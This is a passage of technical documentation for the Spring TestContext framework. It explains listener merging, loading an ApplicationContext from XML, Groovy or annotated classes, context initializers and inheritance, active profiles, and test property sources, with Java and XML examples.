configuration.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@ContextConfiguration\n\t@TestExecutionListeners({\n\t\tMyCustomTestExecutionListener.class,\n\t\tServletTestExecutionListener.class,\n\t\tDirtiesContextBeforeModesTestExecutionListener.class,\n\t\tDependencyInjectionTestExecutionListener.class,\n\t\tDirtiesContextTestExecutionListener.class,\n\t\tTransactionalTestExecutionListener.class,\n\t\tSqlScriptsTestExecutionListener.class\n\t})\n\tpublic class MyTest {\n\t\t\/\/ class body...\n\t}\n----\n\nThe challenge with this approach is that it requires that the developer know exactly\nwhich listeners are registered by default. Moreover, the set of default listeners can\nchange from release to release -- for example, `SqlScriptsTestExecutionListener` was\nintroduced in Spring Framework 4.1, and `DirtiesContextBeforeModesTestExecutionListener`\nwas introduced in Spring Framework 4.2. Furthermore, third-party frameworks like Spring\nSecurity register their own default ++TestExecutionListener++s via the aforementioned\n<<testcontext-tel-config-automatic-discovery, automatic discovery mechanism>>.\n\nTo avoid having to be aware of and re-declare **all** _default_ listeners, the\n`mergeMode` attribute of `@TestExecutionListeners` can be set to\n`MergeMode.MERGE_WITH_DEFAULTS`. `MERGE_WITH_DEFAULTS` indicates that locally declared\nlisteners should be merged with the default listeners. The merging algorithm ensures that\nduplicates are removed from the list and that the resulting set of merged listeners is\nsorted according to the semantics of `AnnotationAwareOrderComparator` as described in\n<<testcontext-tel-config-ordering>>. If a listener implements `Ordered` or is annotated\nwith `@Order` it can influence the position in which it is merged with the defaults;\notherwise, locally declared listeners will simply be appended to the list of default\nlisteners when merged.\n\nFor example, if the `MyCustomTestExecutionListener` class in the previous example\nconfigures its `order` value (for example, `500`) to be less than the order of the\n`ServletTestExecutionListener` (which happens to be `1000`), the\n`MyCustomTestExecutionListener` can then be automatically merged with the list of\ndefaults _in front of_ the `ServletTestExecutionListener`, and the previous example could\nbe replaced with the following.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@ContextConfiguration\n\t@TestExecutionListeners(\n\t\tlisteners = MyCustomTestExecutionListener.class,\n\t\tmergeMode = MERGE_WITH_DEFAULTS\n\t)\n\tpublic class MyTest {\n\t\t\/\/ class body...\n\t}\n----\n\n\n[[testcontext-ctx-management]]\n==== Context management\n\nEach `TestContext` provides context management and caching support for the test instance\nit is responsible for. Test instances do not automatically receive access to the\nconfigured `ApplicationContext`. However, if a test class implements the\n`ApplicationContextAware` interface, a reference to the `ApplicationContext` is supplied\nto the test instance. Note that `AbstractJUnit4SpringContextTests` and\n`AbstractTestNGSpringContextTests` implement `ApplicationContextAware` and therefore\nprovide access to the `ApplicationContext` automatically.\n\n.@Autowired ApplicationContext\n[TIP]\n====\nAs an alternative to implementing the `ApplicationContextAware` interface, you can\ninject the application context for your test class through the `@Autowired` annotation\non either a field or setter method. For example:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t@ContextConfiguration\n\tpublic class MyTest {\n\n\t\t**@Autowired**\n\t\tprivate ApplicationContext applicationContext;\n\n\t\t\/\/ class body...\n\t}\n----\n\nSimilarly, if your test is configured to load a `WebApplicationContext`, you can inject\nthe web application context into your test as follows:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t**@WebAppConfiguration**\n\t@ContextConfiguration\n\tpublic class MyWebAppTest {\n\t\t**@Autowired**\n\t\tprivate WebApplicationContext wac;\n\n\t\t\/\/ class body...\n\t}\n----\n\nDependency injection via `@Autowired` is provided by the\n`DependencyInjectionTestExecutionListener` which is configured by default (see\n<<testcontext-fixture-di>>).\n====\n\nTest classes that use the TestContext framework do not need to extend any particular\nclass or implement a specific interface to configure their application context. Instead,\nconfiguration is achieved simply by declaring the `@ContextConfiguration` annotation at\nthe class level. If your test class does not explicitly declare application context\nresource `locations` or annotated `classes`, the configured `ContextLoader` determines\nhow to load a context from a default location or default configuration classes. In\naddition to context resource `locations` and annotated `classes`, an application context\ncan also be configured via application context `initializers`.\n\nThe following sections explain how to configure an `ApplicationContext` via XML\nconfiguration files, Groovy scripts, annotated classes (typically `@Configuration`\nclasses), or context initializers using Spring's `@ContextConfiguration` annotation.\nAlternatively, you can implement and configure your own custom `SmartContextLoader` for\nadvanced use cases.\n\n[[testcontext-ctx-management-xml]]\n===== Context configuration with XML resources\n\nTo load an `ApplicationContext` for your tests using XML configuration files, annotate\nyour test class with `@ContextConfiguration` and configure the `locations` attribute with\nan array that contains the resource locations of XML configuration metadata. A plain or\nrelative path -- for example `\"context.xml\"` -- will be treated as a classpath resource\nthat is relative to the package in which the test class is defined. A path starting with\na slash is treated as an absolute classpath location, for example\n`\"\/org\/example\/config.xml\"`. A path which represents a resource URL (i.e., a path\nprefixed with `classpath:`, `file:`, `http:`, etc.) will be used __as is__.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t\/\/ ApplicationContext will be loaded from \"\/app-config.xml\" and\n\t\/\/ \"\/test-config.xml\" in the root of the classpath\n\t**@ContextConfiguration(locations={\"\/app-config.xml\", \"\/test-config.xml\"})**\n\tpublic class MyTest {\n\t\t\/\/ class body...\n\t}\n----\n\n`@ContextConfiguration` supports an alias for the `locations` attribute through the\nstandard Java `value` attribute. Thus, if you do not need to declare additional\nattributes in `@ContextConfiguration`, you can omit the declaration of the `locations`\nattribute name and declare the resource locations by using the shorthand format\ndemonstrated in the following example.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t**@ContextConfiguration({\"\/app-config.xml\", \"\/test-config.xml\"})**\n\tpublic class MyTest {\n\t\t\/\/ class body...\n\t}\n----\n\nIf you omit both the `locations` and `value` attributes from the `@ContextConfiguration`\nannotation, the TestContext framework will attempt to detect a default XML resource\nlocation. Specifically, `GenericXmlContextLoader` and `GenericXmlWebContextLoader` detect\na default location based on the name of the test class. If your class is named\n`com.example.MyTest`, `GenericXmlContextLoader` loads your application context from\n`\"classpath:com\/example\/MyTest-context.xml\"`.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpackage com.example;\n\n\t@RunWith(SpringRunner.class)\n\t\/\/ ApplicationContext will be loaded from\n\t\/\/ \"classpath:com\/example\/MyTest-context.xml\"\n\t**@ContextConfiguration**\n\tpublic class MyTest {\n\t\t\/\/ class body...\n\t}\n----\n\n[[testcontext-ctx-management-groovy]]\n===== Context configuration with Groovy scripts\n\nTo load an `ApplicationContext` for your tests using Groovy scripts that utilize the\n<<groovy-bean-definition-dsl,Groovy Bean Definition DSL>>, annotate your test class with\n`@ContextConfiguration` and configure the `locations` or `value` attribute with an array\nthat contains the resource locations of Groovy scripts. Resource lookup semantics for\nGroovy scripts are the same as those described for <<testcontext-ctx-management-xml,XML\nconfiguration files>>.\n\n\n.Enabling Groovy script support\n[TIP]\n====\nSupport for using Groovy scripts to load an `ApplicationContext` in the Spring\nTestContext Framework is enabled automatically if Groovy is on the classpath.\n====\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t\/\/ ApplicationContext will be loaded from \"\/AppConfig.groovy\" and\n\t\/\/ \"\/TestConfig.groovy\" in the root of the classpath\n\t**@ContextConfiguration({\"\/AppConfig.groovy\", \"\/TestConfig.Groovy\"})**\n\tpublic class MyTest {\n\t\t\/\/ class body...\n\t}\n----\n\nIf you omit both the `locations` and `value` attributes from the `@ContextConfiguration`\nannotation, the TestContext framework will attempt to detect a default Groovy script.\nSpecifically, `GenericGroovyXmlContextLoader` and `GenericGroovyXmlWebContextLoader`\ndetect a default location based on the name of the test class. If your class is named\n`com.example.MyTest`, the Groovy context loader will load your application context from\n`\"classpath:com\/example\/MyTestContext.groovy\"`.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpackage com.example;\n\n\t@RunWith(SpringRunner.class)\n\t\/\/ ApplicationContext will be loaded from\n\t\/\/ \"classpath:com\/example\/MyTestContext.groovy\"\n\t**@ContextConfiguration**\n\tpublic class MyTest {\n\t\t\/\/ class body...\n\t}\n----\n\n.Declaring XML config and Groovy scripts simultaneously\n[TIP]\n====\nBoth XML configuration files and Groovy scripts can be declared simultaneously via the\n`locations` or `value` attribute of `@ContextConfiguration`. If the path to a configured\nresource location ends with `.xml` it will be loaded using an `XmlBeanDefinitionReader`;\notherwise it will be loaded using a `GroovyBeanDefinitionReader`.\n\nThe following listing demonstrates how to combine both in an integration test.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t\/\/ ApplicationContext will be loaded from\n\t\/\/ \"\/app-config.xml\" and \"\/TestConfig.groovy\"\n\t@ContextConfiguration({ \"\/app-config.xml\", \"\/TestConfig.groovy\" })\n\tpublic class MyTest {\n\t\t\/\/ class body...\n\t}\n----\n====\n\n[[testcontext-ctx-management-javaconfig]]\n===== Context configuration with annotated classes\n\nTo load an `ApplicationContext` for your tests using __annotated classes__ (see\n<<beans-java>>), annotate your test class with `@ContextConfiguration` and configure the\n`classes` attribute with an array that contains references to annotated classes.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t\/\/ ApplicationContext will be loaded from AppConfig and TestConfig\n\t**@ContextConfiguration(classes = {AppConfig.class, TestConfig.class})**\n\tpublic class MyTest {\n\t\t\/\/ class body...\n\t}\n----\n\n.Annotated Classes\n[TIP]\n====\nThe term __annotated class__ can refer to any of the following.\n\n* A class annotated with `@Configuration`\n* A component (i.e., a class annotated with `@Component`, `@Service`, `@Repository`, etc.)\n* A JSR-330 compliant class that is annotated with `javax.inject` annotations\n* Any other class that contains `@Bean`-methods\n\nConsult the javadocs of `@Configuration` and `@Bean` for further information regarding\nthe configuration and semantics of __annotated classes__, paying special attention to\nthe discussion of __`@Bean` Lite Mode__.\n====\n\nIf you omit the `classes` attribute from the `@ContextConfiguration` annotation, the\nTestContext framework will attempt to detect the presence of default configuration\nclasses. Specifically, `AnnotationConfigContextLoader` and\n`AnnotationConfigWebContextLoader` will detect all `static` nested classes of the test class\nthat meet the requirements for configuration class implementations as specified in the\n`@Configuration` javadocs. In the following example, the `OrderServiceTest` class\ndeclares a `static` nested configuration class named `Config` that will be automatically\nused to load the `ApplicationContext` for the test class. Note that the name of the\nconfiguration class is arbitrary. In addition, a test class can contain more than one\n`static` nested configuration class if desired.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t\/\/ ApplicationContext will be loaded from the\n\t\/\/ static nested Config class\n\t**@ContextConfiguration**\n\tpublic class OrderServiceTest {\n\n\t\t@Configuration\n\t\tstatic class Config {\n\n\t\t\t\/\/ this bean will be injected into the OrderServiceTest class\n\t\t\t@Bean\n\t\t\tpublic OrderService orderService() {\n\t\t\t\tOrderService orderService = new OrderServiceImpl();\n\t\t\t\t\/\/ set properties, etc.\n\t\t\t\treturn orderService;\n\t\t\t}\n\t\t}\n\n\t\t@Autowired\n\t\tprivate OrderService orderService;\n\n\t\t@Test\n\t\tpublic void testOrderService() {\n\t\t\t\/\/ test the orderService\n\t\t}\n\n\t}\n----\n\n[[testcontext-ctx-management-mixed-config]]\n===== Mixing XML, Groovy scripts, and annotated classes\n\nIt may sometimes be desirable to mix XML configuration files, Groovy scripts, and\nannotated classes (i.e., typically `@Configuration` classes) to configure an\n`ApplicationContext` for your tests. For example, if you use XML configuration in\nproduction, you may decide that you want to use `@Configuration` classes to configure\nspecific Spring-managed components for your tests, or vice versa.\n\nFurthermore, some third-party frameworks (like Spring Boot) provide first-class support\nfor loading an `ApplicationContext` from different types of resources simultaneously\n(e.g., XML configuration files, Groovy scripts, and `@Configuration` classes). The Spring\nFramework historically has not supported this for standard deployments. Consequently,\nmost of the `SmartContextLoader` implementations that the Spring Framework delivers in\nthe `spring-test` module support only one resource type per test context; however, this\ndoes not mean that you cannot use both. One exception to the general rule is that the\n`GenericGroovyXmlContextLoader` and `GenericGroovyXmlWebContextLoader` support both XML\nconfiguration files and Groovy scripts simultaneously. Furthermore, third-party\nframeworks may choose to support the declaration of both `locations` and `classes` via\n`@ContextConfiguration`, and with the standard testing support in the TestContext\nframework, you have the following options.\n\nIf you want to use resource locations (e.g., XML or Groovy) __and__ `@Configuration`\nclasses to configure your tests, you will have to pick one as the __entry point__, and\nthat one will have to include or import the other. For example, in XML or Groovy scripts\nyou can include `@Configuration` classes via component scanning or define them as normal\nSpring beans; whereas, in a `@Configuration` class you can use `@ImportResource` to\nimport XML configuration files or Groovy scripts. Note that this behavior is semantically\nequivalent to how you configure your application in production: in production\nconfiguration you will define either a set of XML or Groovy resource locations or a set\nof `@Configuration` classes that your production `ApplicationContext` will be loaded\nfrom, but you still have the freedom to include or import the other type of configuration.\n\n[[testcontext-ctx-management-initializers]]\n===== Context configuration with context initializers\nTo configure an `ApplicationContext` for your tests using context initializers, annotate\nyour test class with `@ContextConfiguration` and configure the `initializers` attribute\nwith an array that contains references to classes that implement\n`ApplicationContextInitializer`. The declared context initializers will then be used to\ninitialize the `ConfigurableApplicationContext` that is loaded for your tests. Note that\nthe concrete `ConfigurableApplicationContext` type supported by each declared\ninitializer must be compatible with the type of `ApplicationContext` created by the\n`SmartContextLoader` in use (i.e., typically a `GenericApplicationContext`).\nFurthermore, the order in which the initializers are invoked depends on whether they\nimplement Spring's `Ordered` interface or are annotated with Spring's `@Order` annotation\nor the standard `@Priority` annotation.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t\/\/ ApplicationContext will be loaded from TestConfig\n\t\/\/ and initialized by TestAppCtxInitializer\n\t**@ContextConfiguration(\n\t\tclasses = TestConfig.class,\n\t\tinitializers = TestAppCtxInitializer.class)**\n\tpublic class MyTest {\n\t\t\/\/ class body...\n\t}\n----\n\nIt is also possible to omit the declaration of XML configuration files, Groovy scripts,\nor annotated classes in `@ContextConfiguration` entirely and instead declare only\n`ApplicationContextInitializer` classes which are then responsible for registering beans\nin the context -- for example, by programmatically loading bean definitions from XML\nfiles or configuration classes.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t\/\/ ApplicationContext will be initialized by EntireAppInitializer\n\t\/\/ which presumably registers beans in the context\n\t**@ContextConfiguration(initializers = EntireAppInitializer.class)**\n\tpublic class MyTest {\n\t\t\/\/ class body...\n\t}\n----\n\n[[testcontext-ctx-management-inheritance]]\n===== Context configuration inheritance\n`@ContextConfiguration` supports boolean `inheritLocations` and `inheritInitializers`\nattributes that denote whether resource locations or annotated classes and context\ninitializers declared by superclasses should be __inherited__. The default value for\nboth flags is `true`. This means that a test class inherits the resource locations or\nannotated classes as well as the context initializers declared by any superclasses.\nSpecifically, the resource locations or annotated classes for a test class are appended\nto the list of resource locations or annotated classes declared by superclasses.\nSimilarly, the initializers for a given test class will be added to the set of\ninitializers defined by test superclasses. Thus, subclasses have the option\nof __extending__ the resource locations, annotated classes, or context initializers.\n\nIf the `inheritLocations` or `inheritInitializers` attribute in `@ContextConfiguration`\nis set to `false`, the resource locations or annotated classes and the context\ninitializers, respectively, for the test class __shadow__ and effectively replace the\nconfiguration defined by superclasses.\n\nIn the following example that uses XML resource locations, the `ApplicationContext` for\n`ExtendedTest` will be loaded from __\"base-config.xml\"__ __and__\n__\"extended-config.xml\"__, in that order. Beans defined in __\"extended-config.xml\"__ may\ntherefore __override__ (i.e., replace) those defined in __\"base-config.xml\"__.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t\/\/ ApplicationContext will be loaded from \"\/base-config.xml\"\n\t\/\/ in the root of the classpath\n\t**@ContextConfiguration(\"\/base-config.xml\")**\n\tpublic class BaseTest {\n\t\t\/\/ class body...\n\t}\n\n\t\/\/ ApplicationContext will be loaded from \"\/base-config.xml\" and\n\t\/\/ \"\/extended-config.xml\" in the root of the classpath\n\t**@ContextConfiguration(\"\/extended-config.xml\")**\n\tpublic class ExtendedTest extends BaseTest {\n\t\t\/\/ class body...\n\t}\n----\n\nSimilarly, in the following example that uses annotated classes, the\n`ApplicationContext` for `ExtendedTest` will be loaded from the `BaseConfig` __and__\n`ExtendedConfig` classes, in that order. Beans defined in `ExtendedConfig` may therefore\noverride (i.e., replace) those defined in `BaseConfig`.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t\/\/ ApplicationContext will be loaded from BaseConfig\n\t**@ContextConfiguration(classes = BaseConfig.class)**\n\tpublic class BaseTest {\n\t\t\/\/ class body...\n\t}\n\n\t\/\/ ApplicationContext will be loaded from BaseConfig and ExtendedConfig\n\t**@ContextConfiguration(classes = ExtendedConfig.class)**\n\tpublic class ExtendedTest extends BaseTest {\n\t\t\/\/ class body...\n\t}\n----\n\nIn the following example that uses context initializers, the `ApplicationContext` for\n`ExtendedTest` will be initialized using `BaseInitializer` __and__\n`ExtendedInitializer`. Note, however, that the order in which the initializers are\ninvoked depends on whether they implement Spring's `Ordered` interface or are annotated\nwith Spring's `@Order` annotation or the standard `@Priority` annotation.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t\/\/ ApplicationContext will be initialized by BaseInitializer\n\t**@ContextConfiguration(initializers = BaseInitializer.class)**\n\tpublic class BaseTest {\n\t\t\/\/ class body...\n\t}\n\n\t\/\/ ApplicationContext will be initialized by BaseInitializer\n\t\/\/ and ExtendedInitializer\n\t**@ContextConfiguration(initializers = ExtendedInitializer.class)**\n\tpublic class ExtendedTest extends BaseTest {\n\t\t\/\/ class body...\n\t}\n----\n\n[[testcontext-ctx-management-env-profiles]]\n===== Context configuration with environment profiles\nSpring 3.1 introduced first-class support in the framework for the notion of\nenvironments and profiles (a.k.a., __bean definition profiles__), and integration tests\ncan be configured to activate particular bean definition profiles for various testing\nscenarios. This is achieved by annotating a test class with the `@ActiveProfiles`\nannotation and supplying a list of profiles that should be activated when loading the\n`ApplicationContext` for the test.\n\n[NOTE]\n====\n`@ActiveProfiles` may be used with any implementation of the new `SmartContextLoader`\nSPI, but `@ActiveProfiles` is not supported with implementations of the older\n`ContextLoader` SPI.\n====\n\nLet's take a look at some examples with XML configuration and `@Configuration` classes.\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<!-- app-config.xml -->\n\t<beans xmlns=\"http:\/\/www.springframework.org\/schema\/beans\"\n\t\txmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n\t\txmlns:jdbc=\"http:\/\/www.springframework.org\/schema\/jdbc\"\n\t\txmlns:jee=\"http:\/\/www.springframework.org\/schema\/jee\"\n\t\txsi:schemaLocation=\"...\">\n\n\t\t<bean id=\"transferService\"\n\t\t\t\tclass=\"com.bank.service.internal.DefaultTransferService\">\n\t\t\t<constructor-arg ref=\"accountRepository\"\/>\n\t\t\t<constructor-arg ref=\"feePolicy\"\/>\n\t\t<\/bean>\n\n\t\t<bean id=\"accountRepository\"\n\t\t\t\tclass=\"com.bank.repository.internal.JdbcAccountRepository\">\n\t\t\t<constructor-arg ref=\"dataSource\"\/>\n\t\t<\/bean>\n\n\t\t<bean id=\"feePolicy\"\n\t\t\tclass=\"com.bank.service.internal.ZeroFeePolicy\"\/>\n\n\t\t<beans profile=\"dev\">\n\t\t\t<jdbc:embedded-database id=\"dataSource\">\n\t\t\t\t<jdbc:script\n\t\t\t\t\tlocation=\"classpath:com\/bank\/config\/sql\/schema.sql\"\/>\n\t\t\t\t<jdbc:script\n\t\t\t\t\tlocation=\"classpath:com\/bank\/config\/sql\/test-data.sql\"\/>\n\t\t\t<\/jdbc:embedded-database>\n\t\t<\/beans>\n\n\t\t<beans profile=\"production\">\n\t\t\t<jee:jndi-lookup id=\"dataSource\" jndi-name=\"java:comp\/env\/jdbc\/datasource\"\/>\n\t\t<\/beans>\n\n\t\t<beans profile=\"default\">\n\t\t\t<jdbc:embedded-database id=\"dataSource\">\n\t\t\t\t<jdbc:script\n\t\t\t\t\tlocation=\"classpath:com\/bank\/config\/sql\/schema.sql\"\/>\n\t\t\t<\/jdbc:embedded-database>\n\t\t<\/beans>\n\n\t<\/beans>\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpackage com.bank.service;\n\n\t@RunWith(SpringRunner.class)\n\t\/\/ ApplicationContext will be loaded from \"classpath:\/app-config.xml\"\n\t@ContextConfiguration(\"\/app-config.xml\")\n\t@ActiveProfiles(\"dev\")\n\tpublic class TransferServiceTest {\n\n\t\t@Autowired\n\t\tprivate TransferService transferService;\n\n\t\t@Test\n\t\tpublic void testTransferService() {\n\t\t\t\/\/ test the transferService\n\t\t}\n\t}\n----\n\nWhen `TransferServiceTest` is run, its `ApplicationContext` will be loaded from the\n`app-config.xml` configuration file in the root of the classpath. If you inspect\n`app-config.xml` you'll notice that the `accountRepository` bean has a dependency on a\n`dataSource` bean; however, `dataSource` is not defined as a top-level bean. Instead,\n`dataSource` is defined three times: in the __production__ profile, the\n__dev__ profile, and the __default__ profile.\n\nBy annotating `TransferServiceTest` with `@ActiveProfiles(\"dev\")` we instruct the Spring\nTestContext Framework to load the `ApplicationContext` with the active profiles set to\n`{\"dev\"}`. As a result, an embedded database will be created and populated with test data,\nand the `accountRepository` bean will be wired with a reference to the development\n`DataSource`. And that's likely what we want in an integration test.\n\nIt is sometimes useful to assign beans to a `default` profile. Beans within the default profile\nare only included when no other profile is specifically activated. This can be used to define\n_fallback_ beans to be used in the application's default state. For example, you may\nexplicitly provide a data source for `dev` and `production` profiles, but define an in-memory\ndata source as a default when neither of these is active.\n\nThe following code listings demonstrate how to implement the same configuration and\nintegration test but using `@Configuration` classes instead of XML.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\t@Profile(\"dev\")\n\tpublic class StandaloneDataConfig {\n\n\t\t@Bean\n\t\tpublic DataSource dataSource() {\n\t\t\treturn new EmbeddedDatabaseBuilder()\n\t\t\t\t.setType(EmbeddedDatabaseType.HSQL)\n\t\t\t\t.addScript(\"classpath:com\/bank\/config\/sql\/schema.sql\")\n\t\t\t\t.addScript(\"classpath:com\/bank\/config\/sql\/test-data.sql\")\n\t\t\t\t.build();\n\t\t}\n\t}\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\t@Profile(\"production\")\n\tpublic class JndiDataConfig {\n\n\t\t@Bean(destroyMethod=\"\")\n\t\tpublic DataSource dataSource() throws Exception {\n\t\t\tContext ctx = new InitialContext();\n\t\t\treturn (DataSource) ctx.lookup(\"java:comp\/env\/jdbc\/datasource\");\n\t\t}\n\t}\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\t@Profile(\"default\")\n\tpublic class DefaultDataConfig {\n\n\t\t@Bean\n\t\tpublic DataSource dataSource() {\n\t\t\treturn new EmbeddedDatabaseBuilder()\n\t\t\t\t.setType(EmbeddedDatabaseType.HSQL)\n\t\t\t\t.addScript(\"classpath:com\/bank\/config\/sql\/schema.sql\")\n\t\t\t\t.build();\n\t\t}\n\t}\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\tpublic class TransferServiceConfig {\n\n\t\t@Autowired DataSource dataSource;\n\n\t\t@Bean\n\t\tpublic TransferService transferService() {\n\t\t\treturn new DefaultTransferService(accountRepository(), feePolicy());\n\t\t}\n\n\t\t@Bean\n\t\tpublic AccountRepository accountRepository() {\n\t\t\treturn new JdbcAccountRepository(dataSource);\n\t\t}\n\n\t\t@Bean\n\t\tpublic FeePolicy feePolicy() {\n\t\t\treturn new ZeroFeePolicy();\n\t\t}\n\n\t}\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpackage com.bank.service;\n\n\t@RunWith(SpringRunner.class)\n\t@ContextConfiguration(classes = {\n\t\t\tTransferServiceConfig.class,\n\t\t\tStandaloneDataConfig.class,\n\t\t\tJndiDataConfig.class,\n\t\t\tDefaultDataConfig.class})\n\t@ActiveProfiles(\"dev\")\n\tpublic class TransferServiceTest {\n\n\t\t@Autowired\n\t\tprivate TransferService transferService;\n\n\t\t@Test\n\t\tpublic void testTransferService() {\n\t\t\t\/\/ test the transferService\n\t\t}\n\t}\n----\n\nIn this variation, we have split the XML configuration into four independent\n`@Configuration` classes:\n\n* `TransferServiceConfig`: acquires a `dataSource` via dependency injection using\n `@Autowired`\n* `StandaloneDataConfig`: defines a `dataSource` for an embedded database suitable for\n developer tests\n* `JndiDataConfig`: defines a `dataSource` that is retrieved from JNDI in a production\n environment\n* `DefaultDataConfig`: defines a `dataSource` for a default embedded database in case\n no profile is active\n\nAs with the XML-based configuration example, we still annotate `TransferServiceTest`\nwith `@ActiveProfiles(\"dev\")`, but this time we specify all four configuration classes\nvia the `@ContextConfiguration` annotation. The body of the test class itself remains\ncompletely unchanged.\n\nIt is often the case that a single set of profiles is used across multiple test classes\nwithin a given project. Thus, to avoid duplicate declarations of the `@ActiveProfiles`\nannotation it is possible to declare `@ActiveProfiles` once on a base class, and\nsubclasses will automatically inherit the `@ActiveProfiles` configuration from the base\nclass. In the following example, the declaration of `@ActiveProfiles` (as well as other\nannotations) has been moved to an abstract superclass, `AbstractIntegrationTest`.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpackage com.bank.service;\n\n\t@RunWith(SpringRunner.class)\n\t@ContextConfiguration(classes = {\n\t\t\tTransferServiceConfig.class,\n\t\t\tStandaloneDataConfig.class,\n\t\t\tJndiDataConfig.class,\n\t\t\tDefaultDataConfig.class})\n\t@ActiveProfiles(\"dev\")\n\tpublic abstract class AbstractIntegrationTest {\n\t}\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpackage com.bank.service;\n\n\t\/\/ \"dev\" profile inherited from superclass\n\tpublic class TransferServiceTest extends AbstractIntegrationTest {\n\n\t\t@Autowired\n\t\tprivate TransferService transferService;\n\n\t\t@Test\n\t\tpublic void testTransferService() {\n\t\t\t\/\/ test the transferService\n\t\t}\n\t}\n----\n\n`@ActiveProfiles` also supports an `inheritProfiles` attribute that can be used to\ndisable the inheritance of active profiles.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpackage com.bank.service;\n\n\t\/\/ \"dev\" profile overridden with \"production\"\n\t@ActiveProfiles(profiles = \"production\", inheritProfiles = false)\n\tpublic class ProductionTransferServiceTest extends AbstractIntegrationTest {\n\t\t\/\/ test body\n\t}\n----\n\n[[testcontext-ctx-management-env-profiles-ActiveProfilesResolver]]\nFurthermore, it is sometimes necessary to resolve active profiles for tests\n__programmatically__ instead of declaratively -- for example, based on:\n\n* the current operating system\n* whether tests are being executed on a continuous integration build server\n* the presence of certain environment variables\n* the presence of custom class-level annotations\n* etc.\n\nTo resolve active bean definition profiles programmatically, simply implement a custom\n`ActiveProfilesResolver` and register it via the `resolver` attribute of\n`@ActiveProfiles`. The following example demonstrates how to implement and register a\ncustom `OperatingSystemActiveProfilesResolver`. For further information, refer to the\ncorresponding javadocs.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpackage com.bank.service;\n\n\t\/\/ \"dev\" profile overridden programmatically via a custom resolver\n\t@ActiveProfiles(\n\t\tresolver = OperatingSystemActiveProfilesResolver.class,\n\t\tinheritProfiles = false)\n\tpublic class TransferServiceTest extends AbstractIntegrationTest {\n\t\t\/\/ test body\n\t}\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpackage com.bank.service.test;\n\n\tpublic class OperatingSystemActiveProfilesResolver implements ActiveProfilesResolver {\n\n\t\t@Override\n\t\tString[] resolve(Class<?> testClass) {\n\t\t\tString profile = ...;\n\t\t\t\/\/ determine the value of profile based on the operating system\n\t\t\treturn new String[] {profile};\n\t\t}\n\t}\n----\n\n[[testcontext-ctx-management-property-sources]]\n===== Context configuration with test property sources\n\nSpring 3.1 introduced first-class support in the framework for the notion of an\nenvironment with a hierarchy of _property sources_, and since Spring 4.1 integration\ntests can be configured with test-specific property sources. In contrast to the\n`@PropertySource` annotation used on `@Configuration` classes, the `@TestPropertySource`\nannotation can be declared on a test class to declare resource locations for test\nproperties files or _inlined_ properties. These test property sources will be added to\nthe set of `PropertySources` in the `Environment` for the `ApplicationContext` loaded\nfor the annotated integration test.\n\n[NOTE]\n====\n`@TestPropertySource` may be used with any implementation of the `SmartContextLoader`\nSPI, but `@TestPropertySource` is not supported with implementations of the older\n`ContextLoader` SPI.\n\nImplementations of `SmartContextLoader` gain access to merged test property source values\nvia the `getPropertySourceLocations()` and `getPropertySourceProperties()` methods in\n`MergedContextConfiguration`.\n====\n\n*Declaring test property sources*\n\nTest properties files can be configured via the `locations` or `value` attribute of\n`@TestPropertySource` as shown in the following example.\n\nBoth traditional and XML-based properties file formats are supported -- for example,\n`\"classpath:\/com\/example\/test.properties\"` or `\"file:\/\/\/path\/to\/file.xml\"`.\n\nEach path will be interpreted as a Spring `Resource`. A plain path -- for example,\n`\"test.properties\"` -- will be treated as a classpath resource that is _relative_ to the\npackage in which the test class is defined. A path starting with a slash will be treated\nas an _absolute_ classpath resource, for example: `\"\/org\/example\/test.xml\"`. A path which\nreferences a URL (e.g., a path prefixed with `classpath:`, `file:`, `http:`, etc.) will\nbe loaded using the specified resource protocol. Resource location wildcards (e.g.\n`**\/*.properties`) are not permitted: each location must evaluate to exactly 